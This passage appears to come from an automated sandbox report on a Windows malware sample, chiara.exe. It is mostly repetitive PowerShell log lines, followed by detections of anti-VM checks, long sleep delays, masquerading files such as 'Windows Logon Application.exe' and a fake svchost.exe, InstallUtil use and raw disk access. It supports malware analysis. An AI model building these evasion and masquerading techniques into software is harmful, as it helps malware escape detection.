Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: shost.exe PID: 744, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory allocated: 1660000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory allocated: 3310000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory allocated: 30B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory allocated: 8750000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory allocated: 9750000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory allocated: 9920000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory allocated: A920000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory allocated: ACF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory allocated: 8750000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1360000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2F10000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2E50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Memory allocated: 13A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Memory allocated: 2F10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Memory allocated: 2D40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Memory allocated: 2940000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Memory allocated: 2A70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Memory allocated: 4A70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Memory allocated: 2800000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Memory allocated: 29F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Memory allocated: 49F0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\chiara.exe

Code function: 0_2_00403A5C sgdt fword ptr [eax]

0_2_00403A5C

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Resources\Themes\explorer.exe	Window / User API: threadDelayed 816	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Window / User API: foregroundWindowGot 805	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Window / User API: threadDelayed 1070	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Window / User API: threadDelayed 852	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Window / User API: foregroundWindowGot 1343	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7390
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2281
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7323
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1411
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8014
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1495
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2154

Source: C:\Windows\Resources\Themes\explorer.exe TID: 1988	Thread sleep count: 816 > 30	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe TID: 1988	Thread sleep count: 207 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6148	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Resources\svchost.exe TID: 6656	Thread sleep count: 1070 > 30	Jump to behavior
Source: C:\Windows\Resources\svchost.exe TID: 6656	Thread sleep count: 852 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe TID: 7428	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe TID: 7468	Thread sleep time: -72000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe TID: 7212	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8100	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1272	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1352	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep count: 8014 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452	Thread sleep count: 1495 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2452	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4708	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6020	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe TID: 5356	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe TID: 7576	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe TID: 3008	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\chiara.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCC940BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	2_2_00007FF6CCC940BC
